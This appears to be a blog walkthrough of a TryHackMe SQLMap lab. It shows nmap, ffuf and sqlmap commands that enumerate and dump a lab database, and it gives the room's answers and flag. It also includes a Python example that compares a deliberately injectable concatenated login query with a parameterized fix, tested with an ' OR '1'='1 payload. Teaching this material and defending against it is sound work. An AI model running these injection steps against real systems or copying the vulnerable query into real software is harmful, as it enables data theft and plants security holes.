TryHackMe SQLMap Room

3 weeks ago 30

Joshua_sk

Hello everyone! In this post, we'll explore how to use sqlmap for automated SQL injection vulnerability scanning. We'll follow along with a TryHackMe learning module to guide you through the process.

IP target: 10.10.162.245

$ sudo nmap -Pn 10.10.162.245
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-20 00:39 EDT
Nmap scan report for 10.10.162.245
Host is up (0.35s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 4.56 seconds

Open port 80: http

Open web browser: http://10.10.162.245

$ ffuf -u http://10.10.162.245/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

/blood: this is an interesting directory

Open web browser: http://10.10.162.245/blood

Go to the login page.

Open Burp Suite and log in with the account admin:admin.

Save this information to a file named login.txt.

$ sqlmap -r login.txt --current-user
[01:11:55] [INFO] retrieved: 'root@localhost'
current user: 'root@localhost'

$ sqlmap -r login.txt --dbs
available databases [6]:
[*] blood
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] test

$ sqlmap -r login.txt -D blood --tables
Database: blood
[3 tables]
+----------+
| blood_db |
| flag     |
| users    |
+----------+

$ sqlmap -r login.txt -D blood -T flag --columns
Database: blood
Table: flag
[3 columns]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| name   | varchar(30) |
| flag   | varchar(50) |
| id     | int(10)     |
+--------+-------------+

$ sqlmap -r login.txt -D blood -T flag --dump
Database: blood
Table: flag
[1 entry]
+----+---------------------+--------+
| id | flag                | name   |
+----+---------------------+--------+
| 1  | thm{sqlm@p_is_L0ve} | flag   |
+----+---------------------+--------+

1. What is the name of the interesting directory?

Answer: blood

2. Who is the current db user?

Answer: root

3. What is the final flag?

Answer: thm{sqlm@p_is_L0ve}
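
Why the login form above is injectable, and what the fix looks like, as an added example that is not code from the room or from this post: a string-concatenated login query beside a parameterized one. The `users` schema, the function names and the use of in-memory SQLite in place of the room's MySQL are assumptions.

```python
import sqlite3

def make_db():
    """In-memory stand-in for the room's MySQL database (constructed sample data)."""
    db = sqlite3.connect(":memory:")
    # Plaintext passwords keep the sample short; real code stores password hashes.
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.execute("INSERT INTO users (username, password) VALUES ('admin', 'admin')")
    return db

def login_vulnerable(db, username, password):
    # User input is concatenated into the SQL text, so a quote character in
    # either field changes the structure of the query itself.
    query = ("SELECT id FROM users WHERE username = '" + username +
             "' AND password = '" + password + "'")
    return db.execute(query).fetchone() is not None

def login_hardened(db, username, password):
    # Placeholders pass the values separately from the SQL text; they are
    # never parsed as SQL, so the query structure stays fixed.
    query = "SELECT id FROM users WHERE username = ? AND password = ?"
    return db.execute(query, (username, password)).fetchone() is not None

# Constructed test input: a quote followed by an always-true condition.
TAUTOLOGY = "' OR '1'='1"

def compare(db):
    """Return (vulnerable_result, hardened_result) for the same crafted input."""
    return (login_vulnerable(db, "nobody", TAUTOLOGY),
            login_hardened(db, "nobody", TAUTOLOGY))

def apostrophe_breaks_vulnerable(db):
    """A harmless name containing a quote is enough to break the concatenated query."""
    try:
        login_vulnerable(db, "o'brien", "x")
    except sqlite3.OperationalError:
        return True   # syntax error: the database parsed user input as SQL
    return False

if __name__ == "__main__":
    db = make_db()
    print("valid login, hardened:", login_hardened(db, "admin", "admin"))
    print("crafted input (vulnerable, hardened):", compare(db))
    print("apostrophe breaks vulnerable query:", apostrophe_breaks_vulnerable(db))
```

The `root@localhost` result earlier also shows the application's database account was not restricted. Parameterized queries remove the injection, and a least-privilege account limits what any remaining flaw can read.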

Remember! Hacking is illegal; you cannot hack people or companies without permission. This blog post is for educational purposes only, so you can learn and practice in your own environment.
